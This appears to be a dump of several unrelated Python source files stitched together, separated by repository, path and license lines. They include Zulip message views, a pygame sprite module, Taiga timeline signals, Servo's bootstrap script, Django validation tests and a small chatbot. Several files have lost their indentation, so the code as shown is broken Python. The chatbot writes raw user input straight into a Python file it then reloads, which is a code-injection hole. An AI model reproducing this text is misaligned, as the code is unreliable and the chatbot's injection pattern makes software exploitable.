# UserMessage object for that message, which we will attach to the
# rendered message dict before returning it. We attempt to
# bulk-fetch rendered message dicts from memcached using the
# 'messages' list.
search_fields = dict()
message_ids = []
user_message_flags = {}
if include_history:
message_ids = [row[0] for row in query_result]
# TODO: This could be done with an outer join instead of two queries
user_message_flags = dict((user_message.message_id, user_message.flags_list()) for user_message in
UserMessage.objects.filter(user_profile=user_profile,
message__id__in=message_ids))
for row in query_result:
message_id = row[0]
if user_message_flags.get(message_id) is None:
user_message_flags[message_id] = ["read", "historical"]
if is_search:
(_, subject, rendered_content, content_matches, subject_matches) = row
search_fields[message_id] = get_search_fields(rendered_content, subject,
content_matches, subject_matches)
else:
for row in query_result:
message_id = row[0]
flags = row[1]
user_message_flags[message_id] = parse_usermessage_flags(flags)
message_ids.append(message_id)
if is_search:
(_, _, subject, rendered_content, content_matches, subject_matches) = row
search_fields[message_id] = get_search_fields(rendered_content, subject,
content_matches, subject_matches)
cache_transformer = lambda row: Message.build_dict_from_raw_db_row(row, apply_markdown)
id_fetcher = lambda row: row['id']
message_dicts = generic_bulk_cached_fetch(lambda message_id: to_dict_cache_key_id(message_id, apply_markdown),
Message.get_raw_db_rows,
message_ids,
id_fetcher=id_fetcher,
cache_transformer=cache_transformer,
extractor=extract_message_dict,
setter=stringify_message_dict)
message_list = []
for message_id in message_ids:
msg_dict = message_dicts[message_id]
msg_dict.update({"flags": user_message_flags[message_id]})
msg_dict.update(search_fields.get(message_id, {}))
message_list.append(msg_dict)
statsd.incr('loaded_old_messages', len(message_list))
ret = {'messages': message_list,
"result": "success",
"msg": ""}
return json_success(ret)
@authenticated_json_post_view
def json_update_flags(request, user_profile):
    return update_message_flags(request, user_profile)
@has_request_variables
def update_message_flags(request, user_profile,
messages=REQ('messages', validator=check_list(check_int)),
operation=REQ('op'), flag=REQ('flag'),
all=REQ('all', validator=check_bool, default=False)):
request._log_data["extra"] = "[%s %s]" % (operation, flag)
do_update_message_flags(user_profile, operation, flag, messages, all)
return json_success({'result': 'success',
'messages': messages,
'msg': ''})
def create_mirrored_message_users(request, user_profile, recipients):
if "sender" not in request.POST:
return (False, None)
sender_email = request.POST["sender"].strip().lower()
referenced_users = set([sender_email])
if request.POST['type'] == 'private':
for email in recipients:
referenced_users.add(email.lower())
if request.client.name == "zephyr_mirror":
user_check = same_realm_zephyr_user
fullname_function = compute_mit_user_fullname
elif request.client.name == "irc_mirror":
user_check = same_realm_irc_user
fullname_function = compute_irc_user_fullname
elif request.client.name in ("jabber_mirror", "JabberMirror"):
user_check = same_realm_jabber_user
fullname_function = compute_jabber_user_fullname
else:
# Unrecognized mirroring client
return (False, None)
for email in referenced_users:
# Check that all referenced users are in our realm:
if not user_check(user_profile, email):
return (False, None)
# Create users for the referenced users, if needed.
for email in referenced_users:
create_mirror_user_if_needed(user_profile.realm, email, fullname_function)
sender = get_user_profile_by_email(sender_email)
return (True, sender)
def same_realm_zephyr_user(user_profile, email):
# Are the sender and recipient both @mit.edu addresses?
# We have to handle this specially, inferring the domain from the
    # e-mail address, because the recipient may not exist in Zulip
# and we may need to make a stub MIT user on the fly.
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
return user_profile.realm.domain == "mit.edu" and domain == "mit.edu"
def same_realm_irc_user(user_profile, email):
# Check whether the target email address is an IRC user in the
# same realm as user_profile, i.e. if the domain were example.com,
# the IRC user would need to be username@irc.example.com
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
return user_profile.realm.domain == domain.replace("irc.", "")
def same_realm_jabber_user(user_profile, email):
try:
validators.validate_email(email)
except ValidationError:
return False
domain = resolve_email_to_domain(email)
# The ist.mit.edu realm uses mit.edu email addresses so that their accounts
# can receive mail.
if user_profile.realm.domain == 'ist.mit.edu' and domain == 'mit.edu':
return True
return user_profile.realm.domain == domain
@authenticated_api_view
def api_send_message(request, user_profile):
return send_message_backend(request, user_profile)
@authenticated_json_post_view
def json_send_message(request, user_profile):
return send_message_backend(request, user_profile)
# We do not @require_login for send_message_backend, since it is used
# both from the API and the web service. Code calling
# send_message_backend should either check the API key or check that
# the user is logged in.
@has_request_variables
def send_message_backend(request, user_profile,
message_type_name = REQ('type'),
message_to = REQ('to', converter=extract_recipients, default=[]),
forged = REQ(default=False),
subject_name = REQ('subject', lambda x: x.strip(), None),
message_content = REQ('content'),
domain = REQ('domain', default=None),
local_id = REQ(default=None),
queue_id = REQ(default=None)):
client = request.client
is_super_user = request.user.is_api_super_user()
if forged and not is_super_user:
return json_error("User not authorized for this query")
realm = None
if domain and domain != user_profile.realm.domain:
if not is_super_user:
# The email gateway bot needs to be able to send messages in
# any realm.
return json_error("User not authorized for this query")
realm = get_realm(domain)
if not realm:
return json_error("Unknown domain " + domain)
if client.name in ["zephyr_mirror", "irc_mirror", "jabber_mirror", "JabberMirror"]:
# Here's how security works for mirroring:
#
# For private messages, the message must be (1) both sent and
# received exclusively by users in your realm, and (2)
# received by the forwarding user.
#
# For stream messages, the message must be (1) being forwarded
# by an API superuser for your realm and (2) being sent to a
# mirrored stream (any stream for the Zephyr and Jabber
# mirrors, but only streams with names starting with a "#" for
# IRC mirrors)
#
# The security checks are split between the below code
# (especially create_mirrored_message_users which checks the
# same-realm constraint) and recipient_for_emails (which
# checks that PMs are received by the forwarding user)
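        # e.g. (hypothetical case) a zephyr_mirror client on an mit.edu realm may
        # forward a private message only when every referenced address is an
        # @mit.edu address and the forwarding user is one of the recipients.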
if "sender" not in request.POST:
return json_error("Missing sender")
if message_type_name != "private" and not is_super_user:
return json_error("User not authorized for this query")
(valid_input, mirror_sender) = \
create_mirrored_message_users(request, user_profile, message_to)
if not valid_input:
return json_error("Invalid mirrored message")
if client.name == "zephyr_mirror" and user_profile.realm.domain != "mit.edu":
return json_error("Invalid mirrored realm")
if (client.name == "irc_mirror" and message_type_name != "private" and
not message_to[0].startswith("#")):
return json_error("IRC stream names must start with #")
sender = mirror_sender
else:
sender = user_profile
ret = check_send_message(sender, client, message_type_name, message_to,
subject_name, message_content, forged=forged,
forged_timestamp = request.POST.get('time'),
forwarder_user_profile=user_profile, realm=realm,
local_id=local_id, sender_queue_id=queue_id)
return json_success({"id": ret})
@authenticated_json_post_view
def json_update_message(request, user_profile):
return update_message_backend(request, user_profile)
@has_request_variables
def update_message_backend(request, user_profile,
message_id=REQ(converter=to_non_negative_int),
subject=REQ(default=None),
propagate_mode=REQ(default="change_one"),
content=REQ(default=None)):
if subject is None and content is None:
return json_error("Nothing to change")
do_update_message(user_profile, message_id, subject, propagate_mode, content)
return json_success()
@authenticated_json_post_view
@has_request_variables
def json_fetch_raw_message(request, user_profile,
message_id=REQ(converter=to_non_negative_int)):
try:
message = Message.objects.get(id=message_id)
except Message.DoesNotExist:
return json_error("No such message")
if message.sender != user_profile:
return json_error("Message was not sent by you")
return json_success({"raw_content": message.content})
@has_request_variables
def render_message_backend(request, user_profile, content=REQ):
rendered_content = bugdown.convert(content, user_profile.realm.domain)
return json_success({"rendered": rendered_content})
@authenticated_json_post_view
def json_messages_in_narrow(request, user_profile):
return messages_in_narrow_backend(request, user_profile)
@has_request_variables
def messages_in_narrow_backend(request, user_profile,
msg_ids = REQ(validator=check_list(check_int)),
narrow = REQ(converter=narrow_parameter)):
# Note that this function will only work on messages the user
# actually received
# TODO: We assume that the narrow is a search. For now this works because
# the browser only ever calls this function for searches, since it can't
# apply that narrow operator itself.
query = select([column("message_id"), column("subject"), column("rendered_content")],
and_(column("user_profile_id") == literal(user_profile.id),
column("message_id").in_(msg_ids)),
join("zerver_usermessage", "zerver_message",
literal_column("zerver_usermessage.message_id") ==
literal_column("zerver_message.id")))
builder = NarrowBuilder(user_profile, column("message_id"))
for term in narrow:
query = builder.add_term(query, term)
sa_conn = get_sqlalchemy_connection()
query_result = list(sa_conn.execute(query).fetchall())
search_fields = dict()
for row in query_result:
(message_id, subject, rendered_content, content_matches, subject_matches) = row
search_fields[message_id] = get_search_fields(rendered_content, subject,
content_matches, subject_matches)
return json_success({"messages": search_fields})
|
JanzTam/zulip
|
zerver/views/messages.py
|
Python
|
apache-2.0
| 36,656
| 0.003492
|
import pygame
from pygame.colordict import THECOLORS
import data
class Platform(pygame.sprite.Sprite):
def __init__(self, width, height):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface([width, height])
self.image.fill(THECOLORS["green"])
self.rect = self.image.get_rect()
class Trampoline(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = data.load_image("trampoline.png")
self.rect = self.image.get_rect()
|
Sveder/pyweek24
|
gamelib/platforms.py
|
Python
|
apache-2.0
| 537
| 0
|
# Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _
from taiga.projects.history import services as history_services
from taiga.projects.models import Project
from taiga.users.models import User
from taiga.projects.history.choices import HistoryType
from taiga.timeline.service import (push_to_timeline,
build_user_namespace,
build_project_namespace,
extract_user_info)
# TODO: Add events to followers timeline when followers are implemented.
# TODO: Add events to project watchers timeline when project watchers are implemented.
def _push_to_timeline(*args, **kwargs):
if settings.CELERY_ENABLED:
push_to_timeline.delay(*args, **kwargs)
else:
push_to_timeline(*args, **kwargs)
def _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data={}):
if project is not None:
# Actions related with a project
## Project timeline
_push_to_timeline(project, obj, event_type, created_datetime,
namespace=build_project_namespace(project),
extra_data=extra_data)
## User profile timelines
## - Me
related_people = User.objects.filter(id=user.id)
## - Owner
if hasattr(obj, "owner_id") and obj.owner_id:
related_people |= User.objects.filter(id=obj.owner_id)
## - Assigned to
if hasattr(obj, "assigned_to_id") and obj.assigned_to_id:
related_people |= User.objects.filter(id=obj.assigned_to_id)
## - Watchers
watchers = getattr(obj, "watchers", None)
if watchers:
related_people |= obj.watchers.all()
## - Exclude inactive and system users and remove duplicate
related_people = related_people.exclude(is_active=False)
related_people = related_people.exclude(is_system=True)
related_people = related_people.distinct()
_push_to_timeline(related_people, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
else:
# Actions not related with a project
## - Me
_push_to_timeline(user, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
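# Rough sketch of the fan-out above (assuming a project-scoped object): one
# entry goes to the project namespace and one to the acting user's namespace,
# with the object's owner, assignee and watchers added as recipients, minus
# inactive and system users.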
def _clean_description_fields(values_diff):
    # description_diff and description_html can be huge if included, so we
    # remove the html one and clear the diff
values_diff.pop("description_html", None)
if "description_diff" in values_diff:
values_diff["description_diff"] = _("Check the history API for the exact diff")
def on_new_history_entry(sender, instance, created, **kwargs):
if instance._importing:
return
if instance.is_hidden:
return None
model = history_services.get_model_from_key(instance.key)
pk = history_services.get_pk_from_key(instance.key)
obj = model.objects.get(pk=pk)
project = obj.project
if instance.type == HistoryType.create:
event_type = "create"
elif instance.type == HistoryType.change:
event_type = "change"
elif instance.type == HistoryType.delete:
event_type = "delete"
user = User.objects.get(id=instance.user["pk"])
values_diff = instance.values_diff
_clean_description_fields(values_diff)
extra_data = {
"values_diff": values_diff,
"user": extract_user_info(user),
"comment": instance.comment,
"comment_html": instance.comment_html,
}
# Detect deleted comment
if instance.delete_comment_date:
extra_data["comment_deleted"] = True
created_datetime = instance.created_at
_push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=extra_data)
def create_membership_push_to_timeline(sender, instance, **kwargs):
"""
    Creating a new membership with an associated user. If the user is the project owner
    we do nothing, because that info is already shown in the created-project timeline entry.
@param sender: Membership model
@param instance: Membership object
"""
    # New membership: skip the project owner, whose info already appears in the
    # created-project timeline entry
if not instance.pk and instance.user and instance.user != instance.project.owner:
created_datetime = instance.created_at
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# Updating existing membership
elif instance.pk:
try:
prev_instance = sender.objects.get(pk=instance.pk)
if instance.user != prev_instance.user:
created_datetime = timezone.now()
# The new member
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# If we are updating the old user is removed from project
if prev_instance.user:
_push_to_timelines(instance.project,
prev_instance.user,
prev_instance,
"delete",
created_datetime)
except sender.DoesNotExist:
# This happens with some tests, when a membership is created with a concrete id
pass
def delete_membership_push_to_timeline(sender, instance, **kwargs):
if instance.user:
created_datetime = timezone.now()
_push_to_timelines(instance.project, instance.user, instance, "delete", created_datetime)
def create_user_push_to_timeline(sender, instance, created, **kwargs):
if created:
project = None
user = instance
_push_to_timelines(project, user, user, "create", created_datetime=user.date_joined)
|
obimod/taiga-back
|
taiga/timeline/signals.py
|
Python
|
agpl-3.0
| 6,716
| 0.003873
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function
from distutils.spawn import find_executable
from distutils.version import LooseVersion
import json
import os
import platform
import shutil
import subprocess
from subprocess import PIPE
import servo.packages as packages
from servo.util import extract, download_file, host_triple
def install_trusty_deps(force):
version = str(subprocess.check_output(['gcc', '-dumpversion'])).split('.')
gcc = True
if int(version[0]) > 4:
gcc = False
elif int(version[0]) == 4 and int(version[1]) >= 9:
gcc = False
version = str(subprocess.check_output(['clang', '-dumpversion'])).split('.')
clang = int(version[0]) < 4
if gcc:
run_as_root(["add-apt-repository", "ppa:ubuntu-toolchain-r/test"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "gcc-4.9", "g++-4.9"], force)
run_as_root(['update-alternatives', '--install', '/usr/bin/gcc', 'gcc',
'/usr/bin/gcc-4.9', '60', '--slave', '/usr/bin/g++', 'g++',
'/usr/bin/g++-4.9'])
if clang:
run_as_root(["bash", "-c", 'wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | sudo apt-key add -'])
run_as_root(["apt-add-repository", "deb http://apt.llvm.org/trusty/ llvm-toolchain-xenial-4.0 main"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "clang-4.0"], force)
return gcc or clang
def check_gstreamer_lib():
return subprocess.call(["pkg-config", "gstreamer-1.0 >= 1.12"],
stdout=PIPE, stderr=PIPE) == 0
def run_as_root(command, force=False):
if os.geteuid() != 0:
command.insert(0, 'sudo')
if force:
        command.append("-y")
return subprocess.call(command)
def install_linux_deps(context, pkgs_ubuntu, pkgs_fedora, force):
install = False
pkgs = []
if context.distro == 'Ubuntu':
command = ['apt-get', 'install']
pkgs = pkgs_ubuntu
if subprocess.call(['dpkg', '-s'] + pkgs, stdout=PIPE, stderr=PIPE) != 0:
install = True
elif context.distro in ['CentOS', 'CentOS Linux', 'Fedora']:
installed_pkgs = str(subprocess.check_output(['rpm', '-qa'])).replace('\n', '|')
pkgs = pkgs_fedora
for p in pkgs:
command = ['dnf', 'install']
if "|{}".format(p) not in installed_pkgs:
install = True
break
if install:
if force:
command.append('-y')
print("Installing missing dependencies...")
run_as_root(command + pkgs)
return True
return False
def install_salt_dependencies(context, force):
pkgs_apt = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']
pkgs_dnf = ['gcc', 'libffi-devel', 'python-devel', 'openssl-devel']
if not install_linux_deps(context, pkgs_apt, pkgs_dnf, force):
print("Dependencies are already installed")
def gstreamer(context, force=False):
cur = os.curdir
gstdir = os.path.join(cur, "support", "linux", "gstreamer")
if not os.path.isdir(os.path.join(gstdir, "gstreamer", "lib")):
subprocess.check_call(["bash", "gstreamer.sh"], cwd=gstdir)
return True
return False
def bootstrap_gstreamer(context, force=False):
if not gstreamer(context, force):
print("gstreamer is already set up")
return 0
def linux(context, force=False):
# Please keep these in sync with the packages in README.md
pkgs_apt = ['git', 'curl', 'autoconf', 'libx11-dev', 'libfreetype6-dev',
'libgl1-mesa-dri', 'libglib2.0-dev', 'xorg-dev', 'gperf', 'g++',
'build-essential', 'cmake', 'python-pip',
'libbz2-dev', 'libosmesa6-dev', 'libxmu6', 'libxmu-dev', 'libglu1-mesa-dev',
'libgles2-mesa-dev', 'libegl1-mesa-dev', 'libdbus-1-dev', 'libharfbuzz-dev',
'ccache', 'clang', 'autoconf2.13']
pkgs_dnf = ['libtool', 'gcc-c++', 'libXi-devel', 'freetype-devel',
'mesa-libGL-devel', 'mesa-libEGL-devel', 'glib2-devel', 'libX11-devel',
'libXrandr-devel', 'gperf', 'fontconfig-devel', 'cabextract', 'ttmkfdir',
'python2', 'python2-virtualenv', 'python2-pip', 'expat-devel', 'rpm-build',
'openssl-devel', 'cmake', 'bzip2-devel', 'libXcursor-devel', 'libXmu-devel',
'mesa-libOSMesa-devel', 'dbus-devel', 'ncurses-devel', 'harfbuzz-devel',
'ccache', 'mesa-libGLU-devel', 'clang', 'clang-libs', 'gstreamer1-devel',
'gstreamer1-plugins-base-devel', 'gstreamer1-plugins-bad-free-devel', 'autoconf213']
if context.distro == "Ubuntu":
if context.distro_version == "17.04":
pkgs_apt += ["libssl-dev"]
elif int(context.distro_version.split(".")[0]) < 17:
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
if context.distro_version == "14.04":
pkgs_apt += ["python-virtualenv"]
else:
pkgs_apt += ["virtualenv"]
pkgs_apt += ['libgstreamer1.0-dev', 'libgstreamer-plugins-base1.0-dev',
'libgstreamer-plugins-bad1.0-dev']
elif context.distro == "Debian" and context.distro_version == "Sid":
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
installed_something = install_linux_deps(context, pkgs_apt, pkgs_dnf, force)
if not check_gstreamer_lib():
installed_something |= gstreamer(context, force)
if context.distro == "Ubuntu" and context.distro_version == "14.04":
installed_something |= install_trusty_deps(force)
if not installed_something:
print("Dependencies were already installed!")
return 0
def salt(context, force=False):
# Ensure Salt dependencies are installed
install_salt_dependencies(context, force)
# Ensure Salt is installed in the virtualenv
    # It's not installed globally because it's a large, non-required dependency,
# and the installation fails on Windows
print("Checking Salt installation...", end='')
reqs_path = os.path.join(context.topdir, 'python', 'requirements-salt.txt')
process = subprocess.Popen(
["pip", "install", "-q", "-I", "-r", reqs_path],
stdout=PIPE,
stderr=PIPE
)
process.wait()
if process.returncode:
out, err = process.communicate()
print('failed to install Salt via pip:')
print('Output: {}\nError: {}'.format(out, err))
return 1
print("done")
salt_root = os.path.join(context.sharedir, 'salt')
config_dir = os.path.join(salt_root, 'etc', 'salt')
pillar_dir = os.path.join(config_dir, 'pillars')
# In order to allow `mach bootstrap` to work from any CWD,
# the `root_dir` must be an absolute path.
# We place it under `context.sharedir` because
# Salt caches data (e.g. gitfs files) in its `var` subdirectory.
# Hence, dynamically generate the config with an appropriate `root_dir`
# and serialize it as JSON (which is valid YAML).
config = {
'hash_type': 'sha384',
'master': 'localhost',
'root_dir': salt_root,
'state_output': 'changes',
'state_tabular': True,
}
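    # The minion file written below is plain JSON, which Salt reads as YAML;
    # with illustrative paths it looks roughly like:
    #   {"hash_type": "sha384", "master": "localhost",
    #    "root_dir": "/home/user/.servo/salt", "state_output": "changes",
    #    "state_tabular": true, "fileserver_backend": ["git"], ...}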
if 'SERVO_SALTFS_ROOT' in os.environ:
config.update({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [os.path.abspath(os.environ['SERVO_SALTFS_ROOT'])],
},
})
else:
config.update({
'fileserver_backend': ['git'],
'gitfs_env_whitelist': 'base',
'gitfs_provider': 'gitpython',
'gitfs_remotes': [
'https://github.com/servo/saltfs.git',
],
})
if not os.path.exists(config_dir):
os.makedirs(config_dir, mode=0o700)
with open(os.path.join(config_dir, 'minion'), 'w') as config_file:
config_file.write(json.dumps(config) + '\n')
# Similarly, the pillar data is created dynamically
# and temporarily serialized to disk.
# This dynamism is not yet used, but will be in the future
# to enable Android bootstrapping by using
# context.sharedir as a location for Android packages.
pillar = {
'top.sls': {
'base': {
'*': ['bootstrap'],
},
},
'bootstrap.sls': {
'fully_managed': False,
},
}
if os.path.exists(pillar_dir):
shutil.rmtree(pillar_dir)
os.makedirs(pillar_dir, mode=0o700)
for filename in pillar:
with open(os.path.join(pillar_dir, filename), 'w') as pillar_file:
pillar_file.write(json.dumps(pillar[filename]) + '\n')
cmd = [
# sudo escapes from the venv, need to use full path
find_executable('salt-call'),
'--local',
'--config-dir={}'.format(config_dir),
'--pillar-root={}'.format(pillar_dir),
'state.apply',
'servo-build-dependencies',
]
if not force:
print('Running bootstrap in dry-run mode to show changes')
# Because `test=True` mode runs each state individually without
# considering how required/previous states affect the system,
# it will often report states with requisites as failing due
# to the requisites not actually being run,
# even though these are spurious and will succeed during
# the actual highstate.
# Hence `--retcode-passthrough` is not helpful in dry-run mode,
# so only detect failures of the actual salt-call binary itself.
retcode = run_as_root(cmd + ['test=True'])
if retcode != 0:
print('Something went wrong while bootstrapping')
return retcode
proceed = raw_input(
'Proposed changes are above, proceed with bootstrap? [y/N]: '
)
if proceed.lower() not in ['y', 'yes']:
return 0
print('')
print('Running Salt bootstrap')
retcode = run_as_root(cmd + ['--retcode-passthrough'])
if retcode == 0:
print('Salt bootstrapping complete')
else:
print('Salt bootstrapping encountered errors')
return retcode
def windows_msvc(context, force=False):
'''Bootstrapper for MSVC building on Windows.'''
deps_dir = os.path.join(context.sharedir, "msvc-dependencies")
deps_url = "https://servo-deps.s3.amazonaws.com/msvc-deps/"
def version(package):
return packages.WINDOWS_MSVC[package]
def package_dir(package):
return os.path.join(deps_dir, package, version(package))
def check_cmake(version):
cmake_path = find_executable("cmake")
if cmake_path:
cmake = subprocess.Popen([cmake_path, "--version"], stdout=PIPE)
cmake_version = cmake.stdout.read().splitlines()[0].replace("cmake version ", "")
if LooseVersion(cmake_version) >= LooseVersion(version):
return True
return False
to_install = {}
for package in packages.WINDOWS_MSVC:
# Don't install CMake if it already exists in PATH
if package == "cmake" and check_cmake(version("cmake")):
continue
if not os.path.isdir(package_dir(package)):
to_install[package] = version(package)
if not to_install:
return 0
print("Installing missing MSVC dependencies...")
for package in to_install:
full_spec = '{}-{}'.format(package, version(package))
parent_dir = os.path.dirname(package_dir(package))
if not os.path.isdir(parent_dir):
os.makedirs(parent_dir)
zip_path = package_dir(package) + ".zip"
if not os.path.isfile(zip_path):
zip_url = "{}{}.zip".format(deps_url, full_spec)
download_file(full_spec, zip_url, zip_path)
print("Extracting {}...".format(full_spec), end='')
extract(zip_path, deps_dir)
print("done")
extracted_path = os.path.join(deps_dir, full_spec)
os.rename(extracted_path, package_dir(package))
return 0
LINUX_SPECIFIC_BOOTSTRAPPERS = {
"salt": salt,
"gstreamer": bootstrap_gstreamer,
}
def bootstrap(context, force=False, specific=None):
'''Dispatches to the right bootstrapping function for the OS.'''
bootstrapper = None
if "windows-msvc" in host_triple():
bootstrapper = windows_msvc
elif "linux-gnu" in host_triple():
distro, version, _ = platform.linux_distribution()
if distro.lower() in [
'centos',
'centos linux',
'debian',
'fedora',
'ubuntu',
]:
context.distro = distro
context.distro_version = version
bootstrapper = LINUX_SPECIFIC_BOOTSTRAPPERS.get(specific, linux)
else:
raise Exception("mach bootstrap does not support %s, please file a bug" % distro)
if bootstrapper is None:
print('Bootstrap support is not yet available for your OS.')
return 1
return bootstrapper(context, force=force)
|
sadmansk/servo
|
python/servo/bootstrap.py
|
Python
|
mpl-2.0
| 13,376
| 0.00157
|
from django import forms
from django.test import TestCase
from django.core.exceptions import NON_FIELD_ERRORS
from modeltests.validation import ValidationTestCase
from modeltests.validation.models import Author, Article, ModelToValidate
# Import other tests for this package.
from modeltests.validation.validators import TestModelsWithValidators
from modeltests.validation.test_unique import (GetUniqueCheckTests,
PerformUniqueChecksTest)
from modeltests.validation.test_custom_messages import CustomMessagesTest
class BaseModelValidationTests(ValidationTestCase):
def test_missing_required_field_raises_error(self):
mtv = ModelToValidate(f_with_custom_validator=42)
self.assertFailsValidation(mtv.full_clean, ['name', 'number'])
def test_with_correct_value_model_validates(self):
mtv = ModelToValidate(number=10, name='Some Name')
self.assertEqual(None, mtv.full_clean())
def test_custom_validate_method(self):
mtv = ModelToValidate(number=11)
self.assertFailsValidation(mtv.full_clean, [NON_FIELD_ERRORS, 'name'])
def test_wrong_FK_value_raises_error(self):
mtv=ModelToValidate(number=10, name='Some Name', parent_id=3)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_correct_FK_value_validates(self):
parent = ModelToValidate.objects.create(number=10, name='Some Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertEqual(None, mtv.full_clean())
def test_limited_FK_raises_error(self):
# The limit_choices_to on the parent field says that a parent object's
# number attribute must be 10, so this should fail validation.
parent = ModelToValidate.objects.create(number=11, name='Other Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_wrong_email_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', email='not-an-email')
self.assertFailsValidation(mtv.full_clean, ['email'])
def test_correct_email_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', email='valid@email.com')
self.assertEqual(None, mtv.full_clean())
def test_wrong_url_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', url='not a url')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'Enter a valid value.'])
def test_correct_url_but_nonexisting_gives_404(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_url_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://www.djangoproject.com/')
self.assertEqual(None, mtv.full_clean()) # This will fail if there's no Internet connection
def test_correct_https_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='https://www.djangoproject.com/')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftp_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftp://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftps_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftps://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_text_greater_that_charfields_max_length_raises_erros(self):
mtv = ModelToValidate(number=10, name='Some Name'*100)
self.assertFailsValidation(mtv.full_clean, ['name',])
class ArticleForm(forms.ModelForm):
class Meta:
model = Article
exclude = ['author']
class ModelFormsTests(TestCase):
def setUp(self):
self.author = Author.objects.create(name='Joseph Kocherhans')
def test_partial_validation(self):
# Make sure the "commit=False and set field values later" idiom still
# works with model validation.
data = {
'title': 'The state of model validation',
'pub_date': '2010-1-10 14:49:00'
}
form = ArticleForm(data)
self.assertEqual(form.errors.keys(), [])
article = form.save(commit=False)
article.author = self.author
article.save()
def test_validation_with_empty_blank_field(self):
# Since a value for pub_date wasn't provided and the field is
# blank=True, model-validation should pass.
# Also, Article.clean() should be run, so pub_date will be filled after
# validation, so the form should save cleanly even though pub_date is
# not allowed to be null.
data = {
'title': 'The state of model validation',
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), [])
self.assertNotEqual(form.instance.pub_date, None)
article = form.save()
def test_validation_with_invalid_blank_field(self):
# Even though pub_date is set to blank=True, an invalid value was
# provided, so it should fail validation.
data = {
'title': 'The state of model validation',
'pub_date': 'never'
}
article = Article(author_id=self.author.id)
form = ArticleForm(data, instance=article)
self.assertEqual(form.errors.keys(), ['pub_date'])
|
bufferapp/buffer-django-nonrel
|
tests/modeltests/validation/tests.py
|
Python
|
bsd-3-clause
| 5,944
| 0.003197
|
import os
import sys as sys
os.system("python bot/bot.py engage")
import bot_response as bot
import bot_learn as learner
def hasUserSwore(message):
if "fuck" in message:
return True
elif "bitch" in message:
return True
elif "Fuck" in message:
return True
elif "Bitch" in message:
return True
else:
return False
#Allow the user to communicate with the bot
#Also allow the bot to learn about the person
def toBot():
if(os.path.isfile(".bot_engage")):
print "You can only run one instance of Clarissa."
else:
swearNum = 1
messageToBot = raw_input("Message: ")
if(messageToBot == "--add-command"):
writeCommand(command=raw_input("Command: "), response=raw_input("Responses: "))
reload(bot)
elif(messageToBot == "kill-bot"):
exit()
elif(messageToBot == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif(messageToBot == "learn"):
learner.learn(db_support=False)
elif(messageToBot == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
bot.getResponse(messageToBot)
toBot()
def writeCommand(command, response):
file = open("bot_response.py", "a")
file.write("\n\telif(messageToBot == \""+command+"\"):")
file.write("\n\t\tprint \"Clarissa: "+response+"\"")
file.flush()
file.close()
commandList = open("commands.list", "w")
commandList.write(command)
commandList.flush()
commandList.close()
def getIf(message, command, response):
if(message == command):
print "Clarissa: "+response
else:
print "I do not understand "+message
def getCommands():
return open("commands.bot", "r").read()
def getResponses():
return open("responses.bot", "r").read()
swearNum = 0
